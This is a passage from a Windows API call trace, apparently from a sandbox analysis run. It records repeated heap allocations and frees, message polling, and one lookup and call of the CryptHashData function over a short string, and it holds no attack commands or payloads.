hHeap=0x970000) returned 1 [0266.760] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0266.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0266.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0266.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0266.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0266.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0266.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0266.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0266.761] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0266.761] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0266.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0266.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0266.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0266.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0266.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0266.762] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0266.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0266.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0266.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0266.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0266.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0266.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0266.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0266.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0266.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0266.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fc8 [0266.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0266.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0266.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0266.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0266.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54fd8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0266.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0266.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0266.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0266.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0266.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0266.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0266.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0266.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0266.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0266.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0266.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0266.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0266.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0266.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0266.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0266.764] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0266.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0266.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0266.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0266.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0266.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0266.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0266.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0266.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0266.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0266.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0266.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0266.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0266.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55058 [0266.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0266.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0266.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0266.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0266.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0266.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0266.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0266.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0266.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0266.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0266.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0266.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0266.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0266.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0266.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0266.765] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0266.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0266.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0266.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0266.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0266.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0266.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0266.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0266.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0266.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0266.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0266.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d18 [0266.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0266.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0266.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0266.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0266.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54fc8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0266.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0266.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0266.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0266.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0266.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0266.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55038 [0266.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0266.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0266.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0266.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0266.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0266.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0266.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.767] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0266.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0266.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0266.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0266.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0266.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0266.767] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0266.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51af0 [0266.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0266.768] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0266.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0266.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0266.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0266.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0266.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0266.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0266.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0266.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0266.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0266.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0266.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0266.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0266.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0266.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0266.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0266.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0266.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0266.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0266.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0266.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0266.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0266.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0266.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0266.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0266.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0266.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0266.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0266.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0266.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0266.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0266.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0266.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0266.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0266.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0266.770] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0266.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51e98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0266.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0266.770] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0266.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0266.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0266.771] CryptHashData (hHash=0xa87290, pbData=0x2e55058, dwDataLen=0x3, dwFlags=0x1) returned 1 [0266.771] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.771] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0266.771] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.771] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0266.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51c10 [0266.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0266.771] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0266.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0266.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0266.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0266.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0266.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0266.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0266.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0266.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0266.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0266.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0266.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0266.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0266.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0266.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0266.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0266.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0266.772] 